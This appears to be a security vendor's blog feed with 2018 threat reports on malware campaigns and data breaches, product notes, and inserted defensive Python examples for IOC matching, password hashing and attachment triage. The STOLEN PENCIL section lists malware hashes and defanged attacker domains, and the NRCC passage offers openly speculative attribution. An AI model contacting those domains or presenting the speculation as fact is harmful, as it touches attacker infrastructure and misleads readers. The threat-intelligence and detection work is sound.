OSX.DarthMiner brings Mac OS X to the Darkside

Some malware-writing Sith Lords are Force-pulling Macs into a crypto mining botnet with malware dubbed OSX.DarthMiner. In a recent report from Malwarebytes, researchers profiled the Mac malware and found that it was combining EmPyre for a backdoor with XMRig for crypto mining. Although this malware seems focused on mining, it does have the ability to execute commands specified by a remote user through EmPyre. DarthMiner is likely stealing passwords and other such sensitive information.

The malware is being distributed through a fake version of a popular Adobe pirating tool Adobe Zii.

And they say the Empire did nothing wrong.


- ebecdeac53069c9db1207b2e0d1110a73bc289e31b0d3261d903163ca4b1e31e

Academia threatened with STOLEN PENCIL

ASERT researchers from Arbor Networks have disclosed their findings on STOLEN PENCIL, an APT campaign targeting academic institutions. Active since at least May 2018, researchers have not attributed the campaign to any one actor, however, they identify the activity as “possibly originating from DPRK (North Korea).” Attackers appear interested in collecting credentials.  

Targets are sent spear-phishing emails that lead to a website displaying a lure and are prompted to install a malicious Google Chrome extension. Many targets are specialized in biomedical engineering, suggesting a possible motivation. Researchers state that poor operational security led to users finding open Web browsers in Korean, English-to-Korean translators open, and keyboards switched to Korean. The attackers use built-in Windows admin tools and commercial off-the-shelf software to “live off the land.”

Post-exploitation persistence is maintained by harvesting passwords from a wide variety of sources such as process memory, Web browsers, network sniffing, and keyloggers. Researchers state that they have not yet discovered evidence of data theft. The following indicators of compromise were released with ASERT’s findings.


- 9d1e11bb4ec34e82e09b4401cd37cf71
- 8b8a2b271ded23c40918f0a2c410571d
- 2ec54216e79120ba9d6ed2640948ce43
- 6a127b94417e224a237c25d0155e95d6
- fd14c377bf19ed5603b761754c388d72
- 1d6ce0778cabecea9ac6b985435b268b
- ab4a0b24f706e736af6052da540351d8
- f082f689394ac71764bca90558b52c4e
- ecda8838823680a0dfc9295bdc2e31fa
- 1cdb3f1da5c45ac94257dbf306b53157
- 2d8c16c1b00e565f3b99ff808287983e
- 5b32288e93c344ad5509e76967ce2b18
- 4e0696d83fa1b0804f95b94fc7c5ec0b
- af84eb2462e0b47d9595c21cf0e623a5
- 75dd30fd0c5cf23d4275576b43bbab2c
- 98de4176903c07b13dfa4849ec88686a
- 09fabdc9aca558bb4ecf2219bb440d98
- 1bd173ee743b49cee0d5f89991fc7b91
- e5e8f74011167da1bf3247dae16ee605
- 0569606a0a57457872b54895cf642143
- 52dbd041692e57790a4f976377adeade


- bizsonet.ayar[.]biz
- bizsonet[.]com
- client-message[.]com
- client-screenfonts[.]com
- *.coreytrevathan[.]com (possibly compromised legitimate site)
- docsdriver[.]com
- grsvps[.]com
- *.gworldtech[.]com (possibly compromised legitimate site)
- itservicedesk[.]org
- pqexport[.]com
- scaurri[.]com
- secozco[.]com
- sharedriver[.]pw
- sharedriver[.]us
- tempdomain8899[.]com
- world-paper[.]net
- zwfaxi[.]com
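The domain indicators above are published defanged (`[.]` instead of `.`), and two carry a `*.` wildcard. The following is an added example, not part of ASERT’s findings or the Perch platform, showing how a defender would refang the published indicators and check them against DNS query logs; the log lines are constructed for illustration and only the domain patterns come from the report.

```python
"""Match defanged threat-report indicators against DNS query logs (added example)."""
import re

# A few of the STOLEN PENCIL domains from the report, kept defanged as published.
INDICATORS = [
    "bizsonet[.]com",
    "*.coreytrevathan[.]com",   # wildcard: the apex and any subdomain
    "sharedriver[.]pw",
]

# Constructed sample DNS log lines: timestamp, client, "query <name> <type>".
SAMPLE_LOGS = [
    "2018-12-10T09:12:01Z 10.0.0.21 query bizsonet.com A",
    "2018-12-10T09:12:05Z 10.0.0.21 query www.coreytrevathan.com A",
    "2018-12-10T09:13:44Z 10.0.0.33 query mail.example.com A",
    "2018-12-10T09:14:02Z 10.0.0.33 query notbizsonet.com A",      # must NOT match
    "2018-12-10T09:15:10Z 10.0.0.40 query SHAREDRIVER.PW AAAA",    # case-insensitive match
]

QUERY_RE = re.compile(r"query\s+(\S+)\s+")


def refang(indicator):
    """Turn a defanged indicator ('example[.]com') back into a real, lower-cased hostname."""
    return indicator.replace("[.]", ".").lower()


def indicator_matches(indicator, hostname):
    """True if the queried name equals the indicator, or falls under a '*.' wildcard."""
    pattern = refang(indicator)
    host = hostname.lower().rstrip(".")
    if pattern.startswith("*."):
        base = pattern[2:]
        # Wildcard covers the apex and real subdomains only; 'notexample.com' is not a hit.
        return host == base or host.endswith("." + base)
    return host == pattern


def extract_queried_name(log_line):
    """Pull the queried hostname out of one constructed log line, or None."""
    m = QUERY_RE.search(log_line)
    return m.group(1) if m else None


def find_hits(log_lines, indicators):
    """Return (log_line, matched_indicator) for every line that hits an indicator."""
    hits = []
    for line in log_lines:
        name = extract_queried_name(line)
        if not name:
            continue
        for ind in indicators:
            if indicator_matches(ind, name):
                hits.append((line, ind))
                break
    return hits


if __name__ == "__main__":
    for line, ind in find_hits(SAMPLE_LOGS, INDICATORS):
        print(f"HIT {ind:28s} <- {line}")
```

The wildcard handling is the part worth getting right: matching on a bare substring would flag `notbizsonet.com` and miss nothing, which is the kind of false positive that makes analysts stop trusting an indicator feed.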

IP Addresses:


Release Notes

December 14, 2018

  • Uncheck “notify customer” by default when multi-selecting
  • Replace the confusing “suppression” icon
  • Add escalation-related filters to public API
  • Add a private community for SEI
  • Add SWIFT ISAC community
  • Enhancements to the ConnectWise Integration
  • Allow MSSPs to link and unlink existing Perch customers

  • Fix critical SLA issues
  • Fix import of newrelic
  • Fix import and relation name
  • Fix action for deleting SLAs

Threat Report Thursday December 6th 2018

on December 6, 2018

This week we’re covering a developing story around a Kubernetes vulnerability that is still shrouded in mystery, a string of high-profile data breaches, and following up on the mobile spyware topic from last week.

You Never Forget Your First Hack

You’ve been hacked. How did this happen? You learn a lot from responding to security incidents and Kubernetes is learning some of those lessons now, the hard way. Red Hat security researchers have recently discovered Kubernetes’ first major security flaw, CVE-2018-1002105, a privilege escalation vulnerability that targets Kubernetes-based services and products.

Red Hat disclosed the flaw to Kubernetes after they detected an exploitation attempt against the Kubernetes API server’s Transport Layer Security (TLS) credentials. Red Hat also noticed that the vulnerability makes it possible for any user to gain full administrative access on any machine running with the Kubernetes platform. Researchers have detected active attacks using this vulnerability. However, it is unclear at present how this vulnerability is being delivered, because the de-auth requests are made over an established connection and do not appear in Kubernetes API server audit logs.

The affected versions are Kubernetes v1.0.x through v1.9.x. Users and organizations were advised to update to one of the following patched versions of Kubernetes: v1.10.11, v1.11.5, v1.12.3, and v1.13.0-rc.1. No indicators of compromise were released with Red Hat’s findings; however, they have published an in-depth technical report.

Big Data Score in High-Profile Data Heist

We’ve seen a burst of high-profile data drops recently. Data from over 600 million users was recently compromised in just three breaches. The National Republican Congressional Committee (NRCC), Quora, and Marriott have all recently disclosed breaches. Each of these breaches can teach us different lessons related to merger and acquisition security, the benefits of security monitoring, and encrypting data at rest.

Although only a low number of user accounts was compromised in the NRCC hack, it only takes one compromised user to have a data breach. NRCC was notified about the breach by a managed security service provider (MSSP). The NRCC then reported the breach to Crowdstrike, one of their security vendors. It’s good that the NRCC had security monitoring; without it, this breach could have lasted for more than the “several months” that attackers reportedly maintained access to compromised accounts.

If this were a hacktivist group, we would expect to see a data dump. If this were a profiteer, we would expect to see a ransom. Neither of these scenarios has occurred. That gives us good reason to believe that the threat actors are not motivated by money or protest. Allow me to be speculative. The threat actors are likely after the intelligence. With enough private communications between Republican politicians, they could gain the leverage needed to ease sanctions related to ongoing Crimea occupation and DNC email hack. During this time, we have seen exactly this occur as House Republicans cool on Russian sanctions.

Quora recently lost user information for 100 million users. Although the information was not particularly sensitive, it did include email addresses and hashed passwords. There was no indication that the passwords were salted, and the disclosure made no mention of a salt being used in the password hashes. Millions of these hashes have likely been cracked. We’ve already heard private reports about this data being leveraged to attempt to access email accounts. If you’ve ever used Quora with a common password, you should reset that password wherever you have used it.
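Why the missing salt matters is easy to see in code. The block below is an added example, not from the Quora disclosure or from Perch: it puts an unsalted SHA-256 store next to a salted PBKDF2 store and shows that, without a salt, every user who chose the same common password ends up with the same stored value, so a single precomputed table recovers all of them at once. The wordlist and iteration count are constructed for the illustration.

```python
"""Unsalted vs. salted password storage (added example)."""
import hashlib
import hmac
import os

PBKDF2_ITERATIONS = 200_000  # assumption: a reasonable work factor for this illustration

# Constructed stand-in for the "common passwords" the text warns about.
COMMON_PASSWORDS = ["123456", "password", "qwerty", "letmein", "iloveyou"]


def unsalted_hash(password):
    """The weak store: a bare SHA-256 of the password, identical for every user who picks it."""
    return hashlib.sha256(password.encode()).hexdigest()


def crack_unsalted(stored_hashes, wordlist=COMMON_PASSWORDS):
    """One precomputed table recovers every user whose password is in the wordlist."""
    table = {unsalted_hash(w): w for w in wordlist}
    return {h: table[h] for h in stored_hashes if h in table}


def hash_password(password, salt=None):
    """Salted PBKDF2-HMAC-SHA256, stored as 'iterations$salt_hex$digest_hex'."""
    if salt is None:
        salt = os.urandom(16)  # fresh random salt per user, stored beside the hash
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"{PBKDF2_ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password, stored):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    iterations, salt_hex, digest_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(digest.hex(), digest_hex)


def same_stored_value(store_fn, password="password"):
    """True if two users who chose the same password end up with identical stored values."""
    return store_fn(password) == store_fn(password)


if __name__ == "__main__":
    print("unsalted collides:", same_stored_value(unsalted_hash))   # True
    print("salted collides:  ", same_stored_value(hash_password))   # False
    print("recovered:", crack_unsalted([unsalted_hash("password")]))
```

A salted, iterated hash does not make a common password strong, which is why the advice above to reset it everywhere still stands; it only stops one cracked hash from unlocking every account that shares the password.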

On Friday, November 30, 2018, Marriott Hotels publicly disclosed a breach impacting the network of their subsidiary, Starwood Hotels and Resorts. This shows the danger of mergers and acquisitions. When you buy another company their security problems become your security problems. Amazon saw this with Twitch, and Marriott is now seeing it with the Starwood acquisition. The official statement emphasizes that the Marriott network was not involved, as the investigation only identified unauthorized access to Starwood’s network.

According to the investigation, the intrusion occurred on or before September 10, 2018, and targeted guest information from reservations. Marriott estimates that the activity affected 500 million guests. Compromised data included a combination of names, mailing addresses, phone numbers, email addresses, passport numbers, dates of birth, reservation dates, and other data points. Marriott also stated that an unknown amount of payment card numbers and payment card expiration dates were accessed with other customer data. It is not clear if the accessed data was successfully exfiltrated by attackers, so we should assume that it definitely was.

Marriott states that during their investigation they found there had been unauthorized access to the Starwood network since 2014. Investigators were partially alerted to the activity by the actors copying and encrypting data from the Starwood Guest Reservation Database. Marriott was able to decrypt the data and determined it was from guest reservations on or close to September 10, 2018. It is unclear if the data was encrypted to help with exfiltration or to destroy evidence of the intrusion. However, the steps taken by the actor to hide the stolen data, or potentially destroy it, show their interest in the sensitive personally identifiable information and in delaying discovery that such information had been compromised.

Speaking of stealthy backdoors, ESET published follow-on research from Operation Windigo related to the use of stealthy SSH backdoors to maintain persistence on compromised hosts. We looked at some of the published indicators and searched for them in Perchybana. No indicators were observed in the last 30 days that match this threat. If you’re a Perch customer, you’re in the clear.

11 Critical Android Vulnerabilities Patched Amid Pegasus Abuse Claims

Google recently patched 11 critical code execution vulnerabilities in Android. Nine were tied to escalation-of-privilege (EoP) bugs. One of the few EoP bugs (CVE-2018-10840) that linked to an external description revealed the flaw was tied to the Android kernel component (ext4 filesystem). Forty-two high-criticality vulnerabilities were also patched. The timing couldn’t be better for journalists using Android. There has been a lot of talk recently about NSO Pegasus mobile spyware abuse. NSO Pegasus spyware is only sold to government organizations and should only be used against criminals and terrorists, yet it has been increasingly used to target journalists’ cellphones. NSO Pegasus spyware was found on Abdulaziz’s phone. The installation has been linked to the Saudi government, and he believes it has something to do with the murder of U.S. journalist Khashoggi.

On Sunday, Abdulaziz’s lawyers filed a lawsuit in Tel Aviv alleging NSO broke international law by knowingly allowing its spyware to be used to infringe upon human rights. “NSO should be held accountable in order to protect the lives of political dissidents, journalists, and human rights activists,” said Abdulaziz’ lawyer, Alaa Mahajna, speaking to CNN.

“The hacking of my phone played a major role in what happened to Jamal, I am really sorry to say,” Abdulaziz told CNN. “The guilt is killing me.”

The lawsuit claims that in the months before the killing, the royal court had access to Mr. Khashoggi’s communications about opposition projects with Mr. Abdulaziz because of the spyware on Mr. Abdulaziz’s phone.

Installing a Small Perch Sensor for the SMB, Seamlessly

on December 4, 2018

Are you worried about those pesky hackers getting into your network and owning your devices? Have you ever wanted enterprise-grade detection capabilities on your small residential or commercial network? Do you search the internet regularly looking for the latest TTPs the bad guys are using (like the ones outlined in our weekly threat reports) and wish you could use that info to hunt for threats in your network? The good news is, you can! I’m here to help you figure out how.

It’s dangerous to go alone, take this with you

Tiny Form Factor

This post is intended for the folks who like to consider themselves “power users”, but who may not have a full-on enterprise-grade network with all the bells and whistles that a multi-million-dollar company can afford. If you feel like this applies to you, look no further. You’re in the right place. You should also know that you’re not alone. Y’all deserve all the protection the big boys get, even though you may not have the same budget they do.

Here at Perch, we believe that good security should be easily available for everyone, small and medium sized businesses included. This is why we offer a solution that can scale from the smallest to the largest of customers, with a similar experience for everyone.

Our sensors and software can be found everywhere, from the smallest home networks (like the one in my apartment), all the way up to large financial institutions with an annual recurring revenue of over five billion dollars. I’m going to assume the bigger organizations don’t need my help figuring this stuff out. So, I’m just going to focus on what is required to set up a tiny form factor sensor (pictured above) in a small residential network with some commercially available, low-cost equipment.

So, what’s required to get set up and running with a Perch sensor?

Turns out, not a whole lot.

Assuming you’ve already got your network topology in place, it’s really quick and easy to get set up. It doesn’t require an advanced level of knowledge to set up either (if you can use a Roku, you can set up a Perch sensor). It’s not something that requires a massive network overhaul where you have to take everything down (and pray that it comes back up). It takes about 20 minutes to set up the sensor. We can Uber Eats you lunch, and you’ll have your sensor set up and running before your food gets there.

Feeling empowered and inspired yet? Good, you should be 😀.

The only network equipment necessary to drop Perch in on your network is a switch with the ability to enable port mirroring. We ideally like to sit behind a firewall, so we can see what makes it past the perimeter defenses, but that’s not required to get set up with us. This write-up is going to assume you’re setting it up on a small home network, running a firewall at the perimeter behind the modem and before the switch.

Besides a switch capable of port mirroring, you’ll really only need an internet connection plus a device that handles traffic routing upstream of the switch. In this case, I’m just using the modem provided by the ISP which handles the DHCP for the whole network upstream of the switch that is mirroring out traffic to the Perch Sensor. The cool thing about doing it this way is I’m able to retain the enhanced services from my ISP that include user analytics profiling abilities, metrics collection capabilities, as well as rogue device detection functionality.

If you don’t have a switch capable of port mirroring, a good economical solution might be a managed smart switch like the TP-Link SG105e. This little 5 port switch is really all you need, with room to spare. One port to bring in the traffic from the modem, one port to forward the traffic back out to any other switches or routers downstream (such as your wireless AP), and two ports for the Perch sensor (one to setup as a mirror/tap, and one so the sensor can connect back to the Perch cloud.) You’ll even have a whole port free to leave you room for growth.

Below is a visual of the topology described above:


(in my use case switch 2 is both a switch and a wireless AP)

Some pro tips:

One thing that helps a lot before you embark on the setup process, is making sure you have a solid asset management list that documents all the machines that are supposed to be on your network (#1 on the SANS 20 Critical Security Controls). Make sure you document their MAC address and their static IP (if you want to give them one or if they have one pre-configured). Most ISP supplied modems will have their own subnet DHCP pool that’s pre-defined, and their modem will have a static IP assigned on that subnet outside of the DHCP range. I highly recommend giving your switch and access point a static IP address as well and assigning your DHCP range to not include those addresses. Personally, I also give some devices (such as my Xbox One) a static IP for many reasons. One of which is to make the network as fast as possible for pwning n00bz on Xbox Live.
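An asset list is only useful if you compare it with what is actually on the wire. The block below is an added example, not Perch’s code, that does that comparison for the kind of small network described above: it parses neighbour-table output in the style of Linux `ip neigh show`, checks each MAC against a documented inventory, confirms static devices sit on their documented address and DHCP clients sit inside the pool, and reports anything unknown or missing. The inventory, pool bounds and neighbour lines are all constructed for the illustration.

```python
"""Audit observed LAN devices against a documented asset list (added example)."""
import ipaddress

# Constructed inventory: MAC -> (name, documented static IP, or None for a DHCP client).
INVENTORY = {
    "aa:bb:cc:00:00:01": ("isp-modem", "192.168.0.1"),   # static, outside the DHCP pool
    "aa:bb:cc:00:00:02": ("switch-1", "192.168.0.2"),
    "aa:bb:cc:00:00:03": ("wifi-ap", "192.168.0.3"),
    "aa:bb:cc:00:00:10": ("xbox-one", "192.168.0.10"),
    "aa:bb:cc:00:00:20": ("laptop", None),               # DHCP client, any pool address is fine
}
# Constructed DHCP pool; static addresses above deliberately sit outside it.
DHCP_POOL = (ipaddress.ip_address("192.168.0.100"), ipaddress.ip_address("192.168.0.199"))

# Constructed sample in the format of 'ip neigh show' on Linux.
SAMPLE_NEIGH = """\
192.168.0.1 dev eth0 lladdr aa:bb:cc:00:00:01 REACHABLE
192.168.0.2 dev eth0 lladdr aa:bb:cc:00:00:02 STALE
192.168.0.11 dev eth0 lladdr aa:bb:cc:00:00:10 REACHABLE
192.168.0.150 dev eth0 lladdr aa:bb:cc:00:00:20 REACHABLE
192.168.0.151 dev eth0 lladdr de:ad:be:ef:00:01 REACHABLE
192.168.0.77 dev eth0  FAILED
"""


def parse_neigh(text):
    """Parse neighbour lines into (ip, mac) pairs; entries without a MAC are skipped."""
    entries = []
    for line in text.splitlines():
        fields = line.split()
        if "lladdr" not in fields:
            continue
        entries.append((fields[0], fields[fields.index("lladdr") + 1].lower()))
    return entries


def in_dhcp_pool(ip):
    """True if the address falls inside the documented DHCP range."""
    addr = ipaddress.ip_address(ip)
    return DHCP_POOL[0] <= addr <= DHCP_POOL[1]


def audit(entries, inventory=INVENTORY):
    """Compare observed (ip, mac) pairs with the inventory and return the discrepancies."""
    report = {"unknown": [], "ip_mismatch": [], "outside_pool": [], "missing": []}
    seen = set()
    for ip, mac in entries:
        seen.add(mac)
        if mac not in inventory:
            report["unknown"].append((ip, mac))      # rogue or undocumented device
            continue
        name, static_ip = inventory[mac]
        if static_ip is not None and static_ip != ip:
            report["ip_mismatch"].append((name, static_ip, ip))   # static device moved
        elif static_ip is None and not in_dhcp_pool(ip):
            report["outside_pool"].append((name, ip))  # DHCP client with an odd address
    report["missing"] = sorted(name for mac, (name, _) in inventory.items() if mac not in seen)
    return report


if __name__ == "__main__":
    for key, items in audit(parse_neigh(SAMPLE_NEIGH)).items():
        print(f"{key:12s} {items}")
```

Run this from a host that sees the whole LAN (the one on the mirror port is a natural choice) and the "unknown" list is your rogue device check; the "ip_mismatch" list catches the case where a device you gave a static address silently fell back to DHCP.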

I could go over all the specifics of how easy it is to install the TFF sensor, but why re-invent the wheel when anything I would put here has already been extensively documented in our help pages. There you should find any additional information you could possibly need to get yourself set up. Of course, we don’t have a problem with hopping on the phone with you to help you get it figured out if you need some assistance. But I believe in your ability to do it yourself.

Now you’re ready:

The great thing about what we offer here at Perch is the fact that you don’t have to be an expert to get us set up on your network, nor do you have to have a full security team to triage the alerts that our sensor generates. We’ve taken care of all that for you. Between our great, service-oriented Customer Success team and our extensive documentation on how to get set up and running, you’ll wonder how you ever lived your life without us to begin with.

Get flocked up!

Here at Perch, we try to make security easy, because it’s already hard enough. If it’s this easy for the little guys, just imagine how painless it will be if you’re an MSP trying to manage multiple small organizations, or if you’re a bigger shop with lots of remote locations you need to monitor. Our solution is applicable for a wide variety of use cases. We look forward to hearing from you about how we can work with you to help you address your security needs.

Join the flock

Threat Report Friday November 30th 2018

on November 30, 2018

Welcome back. I don’t know if you celebrated the largely known U.S. holiday of Thanksgiving, but I did; and I’m grateful I had the week off. We’ve been keeping our ear to the ground. This week we want to tell you about an Emotet malspam campaign that cashed in on Black Friday, an indictment announced for the authors/distributors of SamSam ransomware, and a serious threat to journalists in Mexico.

Emotet Cashes in on Black Friday

You weren’t the only one shopping on Black Friday. ESET researchers found evidence of a large Emotet campaign occurring on Black Friday. Like prior campaigns, Emotet was distributed via spam. In this campaign, the attachments and links are to XML files with .doc extensions instead of DOC or PDF files.

Emotet is known to distribute various banking malware families known for stealing passwords, credit card details, and access to crypto-currency wallets. The United States is one of the top five targeted countries, while the UK and South Africa are in the top ten. Since this campaign was focused on Black Friday, it’s safe to say it was targeting U.S. shoppers getting ready to check their bank balance and do some online shopping.
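The detail that the attachments were XML files carrying a `.doc` extension is something a mail gateway can check directly: a genuine binary `.doc` starts with the Compound File Binary signature, while these files start with XML text. The following is an added example, not ESET’s or Perch’s code, that sniffs the real format of an attachment, flags an extension mismatch, and looks for the Word 2003 XML markers (the `mso-application` processing instruction that makes Office open the file in Word, and `w:macrosPresent="yes"`, which indicates an embedded VBA project). The sample byte strings are constructed and are not real samples.

```python
"""Flag Office attachments whose extension does not match their real format (added example)."""

OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # binary .doc/.xls (Compound File Binary)
ZIP_MAGIC = b"PK\x03\x04"                        # .docx/.xlsx (Office Open XML is a zip)

# Word 2003 XML markers: the processing instruction hands the XML to Word,
# and macrosPresent="yes" on the root element means a VBA project is embedded.
WORD_XML_PI = b'<?mso-application progid="Word.Document"?>'
MACROS_PRESENT = b'w:macrosPresent="yes"'

EXPECTED_FORMATS = {
    "doc": {"ole"}, "dot": {"ole"}, "xls": {"ole"},
    "docx": {"ooxml"}, "docm": {"ooxml"}, "xlsx": {"ooxml"},
    "xml": {"xml"},
}

# Constructed samples (not real malware): an XML file named .doc, a real binary .doc header.
SAMPLE_FAKE_DOC = (
    b'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\r\n'
    b'<?mso-application progid="Word.Document"?>\r\n'
    b'<w:wordDocument xmlns:w="http://schemas.microsoft.com/office/word/2003/wordml" '
    b'w:macrosPresent="yes"><w:binData w:name="editdata.mso">AAAA</w:binData>'
    b"<w:body><w:p><w:r><w:t>Enable editing to view your order</w:t></w:r></w:p></w:body>"
    b"</w:wordDocument>"
)
SAMPLE_REAL_DOC = OLE_MAGIC + b"\x00" * 24


def sniff_format(data):
    """Classify by leading bytes, not by file name."""
    if data.startswith(OLE_MAGIC):
        return "ole"
    if data.startswith(ZIP_MAGIC):
        return "ooxml"
    body = data.lstrip(b"\xef\xbb\xbf \t\r\n")  # skip a UTF-8 BOM and leading whitespace
    if body.startswith(b"<?xml") or body.startswith(b"<"):
        return "xml"
    return "unknown"


def triage_attachment(filename, data):
    """Return the evidence and a verdict: 'pass', 'review' (mismatch) or 'block' (Word XML / macros)."""
    ext = filename.lower().rsplit(".", 1)[-1] if "." in filename else ""
    fmt = sniff_format(data)
    expected = EXPECTED_FORMATS.get(ext)
    mismatch = expected is not None and fmt not in expected
    word_xml = fmt == "xml" and WORD_XML_PI in data
    macros = word_xml and MACROS_PRESENT in data
    if (mismatch and word_xml) or macros:
        verdict = "block"
    elif mismatch:
        verdict = "review"
    else:
        verdict = "pass"
    return {
        "filename": filename, "extension": ext, "format": fmt,
        "extension_mismatch": mismatch, "word_xml": word_xml,
        "macros_present": macros, "verdict": verdict,
    }


if __name__ == "__main__":
    print(triage_attachment("order_confirmation.doc", SAMPLE_FAKE_DOC))
    print(triage_attachment("report.doc", SAMPLE_REAL_DOC))
```

Sniffing bytes rather than trusting the extension is the general lesson; the same check catches a zip renamed to `.doc` or an OLE file renamed to `.docx`, which the `review` verdict covers.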

Catch me if you SamSam

The chase is on for two Iranian nationals charged by a U.S. federal grand jury, following a 34-month long international computer hacking and extortion scheme. Faramarz Shahi Savandi (34) and Mohammad Mehdi Shah Mansouri (27) face a total of six counts alleging that they authored and deployed SamSam ransomware to more than 200 victims, including hospitals, municipalities, and public institutions. The counts are as follows: one count of conspiracy to commit wire fraud, one count of conspiracy to commit fraud and related activity in connection with computers, two substantive counts of intentional damage to a protected computer, and two substantive counts of transmitting a demand in relation to damaging a protected computer.

In the Department of Justice indictment, two individuals, Exchanger 1 and Exchanger 2, are labeled in the Relevant Individuals and Entities section. In a U.S. Department of the Treasury press release also published on November 28, 2018, Ali Khorashadizadeh and Mohammad Ghorbaniyan are named as the financial facilitators in a malicious campaign involving SamSam ransomware. The press release states that they helped exchange digital currency (Bitcoin) ransom payments into Iranian rial on behalf of Iranian malicious cyber actors.

According to the indictment, beginning in December 2015, the offenders reportedly accessed victim computers without authorization through security vulnerabilities. They then installed and executed SamSam, resulting in the unauthorized encryption of data on the victims’ computers. A Bitcoin ransom was demanded in exchange for decryption keys for the encrypted data. The pair then collected ransom payments from victim entities that paid and exchanged the Bitcoin proceeds into Iranian rial using Iran-based Bitcoin exchanges. The indictment alleges that the pair earned over $6 million USD in ransom payments to date and caused over $30 million USD in losses to victims.

Journalists Targeted with Mobile Malware After Cartel Journalist Gunned Down

Journalists in Mexico have faced some very real threats recently, and they can add nation-state level mobile spyware to the list. Somehow, peers of a journalist likely killed by a cartel, are being targeted with nation-state level mobile malware. Something strange is going on here.

Citizen Lab published the seventh report in a series detailing abuse of NSO Group Pegasus Spyware. Citizen Lab and partners have identified a total of 24 cases of abusive targeting by Mexico-linked NSO Group customers. Infection attempts are located in Canada, Mexico, the UAE, the United Kingdom, and the United States.

Pegasus is a sophisticated tool for spying on mobile phones and is exclusively sold to governments for the purposes of fighting terror and investigating crime. According to NSO Group, in the past two years, Pegasus had been used by repressive governments to spy on human rights defenders, journalists, and others who they deem as threats to their power.

In Citizen Lab’s most recent findings, they disclose an attack that occurred in May 2017. Journalist Javier Valdez Cárdenas was gunned down near his office. Shortly after the murder, Cárdenas’ colleagues Andrés Villarreal and Ismael Bojórquez received suspicious messages claiming that Cárdenas’ killers had been identified. The messages contained a malicious link that, once clicked, downloaded NSO spyware onto their mobile devices. Users and organizations should exercise caution when viewing messages from foreign or unknown senders. The malicious URLs are contained within the report.

Sharing Intel

on November 27, 2018

Share intel back to your community through a clean user interface. Perch CISO Wes Spencer shows you how.

Preventing Burnout

on November 20, 2018

In software especially, we lose more talented, hard-working folks to burnout than almost anything else. People who love their job and feel rewarded for doing it almost always stay. However, the tech industry is fast-paced, labor intensive, and the projects are seemingly endless.

The question remains, how can we stop treading proverbial water and get a healthy, positive outlook on our work life?

Make a list

If you do more things than you can count in a day and struggle to remember any of it, you need a list. Often times we feel the most stressed when we are feeling overwhelmed, and yet we still guilt ourselves for not doing enough. There will always be more to do in our ever-connected, feedback-driven world; especially in the tech industry.

By making a list of what you plan to do and crossing it off as you go, you have something to look back at and say, “wow, I really did get a lot done today”. This creates a positive feedback loop in your brain. Ending every day on a high note can make you more positive and less likely to imagine greener pastures elsewhere.

For my list, I like to use the Productivity Planner, but some folks love the Bullet Journal, and others like good ol’ fashioned legal pads.

If you are too cool for an analog list (even though crossing stuff off is way more fun than tapping an app), you can do the same thing with the Reminders app on your phone or a tool like Asana or Todoist.

Agile methods

There’s a lot written on agile, so I won’t go into the details here. The key takeaways for any project are as follows:

  • Break your project into bite-sized chunks
  • Pick a few of those bite-sized chunks and set a regular deadline (every week or two, usually called “sprints”)
  • Track your work as you do it
  • When your sprint is over, celebrate all the hard work you did
  • Rinse and repeat – learn from your mistakes and try to do a little better every sprint

This applies to software, home improvement, getting into shape, you name it.

If you never celebrate the work that you’ve done and never take a moment to breathe, the work feels endless and daunting and, you guessed it, leads to burnout. If you have a big project in front of you, try being agile and see what happens.

Taking breaks

This should go without saying but… take a break. Seriously.

I’m not talking about a three-day weekend every other month. Take at least three days during the week and incorporate doing something you love; whether that is traveling or immersing yourself in a new video game.

Oh, and while you’re at it…

Turn your phone off, hide your laptop, and throw your pager in a river (if you still have one). Flipping the switch from ‘always-on’ to ‘off’, and taking a real vacation has a significant impact on your happiness. How can you really enjoy a camping trip if you are checking Slack? Or, how can you spend quality time with your family if you are surfing Reddit?

Distance makes the heart grow fonder, and you have a long, necessary relationship with your job. Take a break, write it a postcard, and be ready to jump back in on Monday.

Daily routines

One of the best tools we as humans have for creating a sense of stability and safety is routine. If you constantly struggle and feel like a uniquely chaotic snowflake, then establishing a few routines can add a sense of normalcy and familiarity no matter what pops up on your calendar.

Good morning, sunshine

Start by establishing a morning routine, whether it be a cup of coffee in your favorite chair or quick workout if you’re the active type. Starting your day with a little thing just for you can put you in a good mood before clocking in. Try to avoid distractions like Facebook or your inbox before doing something you love.

Time to eat

It may seem like you always have to push out your lunch till 3:00 p.m. or skip it altogether, but do you? Taking time to eat is the healthy thing to do, especially if you are the hangry type. Making the time to eat may just save you from being a grumpy cat to everyone you come in contact with that day.

Don’t be a grumpy, hangry cat. Block out lunch on your calendar, and if someone double-books you, politely ask if there’s a better time to meet. Your stomach, and probably your whole team, will thank you later.

Lights out

Before crawling into bed, consider shutting off all electronics an hour beforehand. Some studies suggest blue light can decrease melatonin production and lead to a lower quality of sleep. I also recommend taking a moment for yourself and establishing another routine that makes you happy. You could put on an album you love, dive into a book with your kids, or give yourself a few minutes to doodle. Giving yourself a chance to genuinely relax before sleeping helps you sleep better and wake up ready to tackle the next day.

I like to start and end my day with the 5 Minute Journal, but my sister prefers a coloring book.

Find your happy

This article is full of tips and tricks, but the most important thing is to find what works for you.
Take time to figure out what makes you happy and do more of that.

Release Notes

November 16, 2018

  • Add a placeholder community for ConnectWise
  • Add more information to ConnectWise payload
  • Sign up as an MSSP
  • Allow for filtering Security Events by date
  • UI for integration with ConnectWise
  • Sort IPs in a user-friendly way

  • Fix bug with subnets not displaying on alerts
  • Fix indicator history not loading
  • Fix status change emails not sending
  • Fix personal vs public comments
  • Kill long-running queries
  • Fix index deletion script

Threat Report Thursday November 15th 2018

on November 15, 2018

Holy moly, it’s the weekly threat report. This is your gentle reminder to patch all the things. That’s the theme for this week, vulnerabilities that need patching and a sprinkle of attack tools.

Microsoft Patch Tuesday

In past reports, we’ve discussed pending 0-days for Edge and Windows; and it looks like some similarly critical vulnerabilities are being patched this week. This Tuesday’s Microsoft patch covered a pair of 0-day vulnerabilities, ten other critical items, and around 50+ other issues. Let’s review a few of those.

